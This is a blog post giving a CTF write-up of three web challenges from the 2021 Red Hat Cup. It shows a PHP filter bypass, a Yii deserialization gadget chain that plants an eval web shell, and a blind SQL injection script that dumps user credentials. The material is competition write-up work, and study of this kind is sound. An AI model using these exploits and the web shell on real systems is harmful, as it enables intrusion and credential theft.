Skip to content
Menu
0xdawn's blog
  • 首页
  • 关于我
  • 联系方式
0xdawn's blog
2021年5月10日2021年9月22日

2021红帽杯 writeup

Web

find_it

dirsearch扫到个robots.txt,里面放着1ndexx.php

直接访问没有东西,查看swp文件.1ndexx.php.swp拿到源码

<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
    die("you die");
}
if(strlen($a)>33){
    die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

payload

http://eci-2zegg15ya7y4this8qz2.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();

访问hack.php,flag在环境变量里

framework

yii反序列化rce,源码在www.zip,改一下链子就行了

https://xz.aliyun.com/t/8307

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[pass]);");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

蚁剑连接http://eci-2ze3l5mg59msjyj8xpg5.cloudeci1.ichunqiu.com/shell.php

蚁剑插件bypass disable_function

WebsiteManger

image.php?id=3处存在注入,手测结果为image.php?id=3/**/or/**/1=1

盲注脚本

import requests

url = 'http://eci-2ze56uon9iidfu8xxa70.cloudeci1.ichunqiu.com/image.php?id=3/**/or/**/1='

def main():
    result = ""
    for i in range(1, 200):
        low = 32
        high = 128
        while low < high:
            mid = int((low + high) / 2)
            content = "select/**/group_concat(username,':',password)/**/from/**/users"
            # content = "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
            # content = "select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'" 
            sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,2)"
            url2 = url+sql
            r = requests.get(url2)
            if len(r.content) == 50811:
                high = mid
            else:
                low = mid + 1
        if low == high == 32:
            print(result)
            break
        result += chr(int((high + low - 1) / 2))
        print(result)
        #admin:1288a7689e3c735652a72

if __name__ == '__main__':
    main()

登录上去之后有个curl,用file协议读取flag

  有时候,禁锢我们的,不是环境设下的牢笼,不是他人施与的压力,而是我们自己把自己局限在狭隘的空间里,在无端中迷失了自我.

云烟成雨

https://www.0xdawn.cn/wp-content/uploads/2019/11/房东的猫-云烟成雨.mp3

文章检索

分类

  • CTF
  • 代码审计
  • 学习笔记
  • 渗透测试
  • 漏洞演练

近期文章

  • 2021长城杯 Write up by D0g3
  • 2021网刃杯 write up
  • 2021羊城杯 Web Write up
  • 第五届蓝帽杯总决赛 write up
  • 第五届强网杯Web部分 write up

归档

联系我们

地址
成都信息工程大学

Email
yan@0xdawn.cn

QQ
1115230222

©2022 0xdawn's blog | Powered by WordPress and Superb Themes!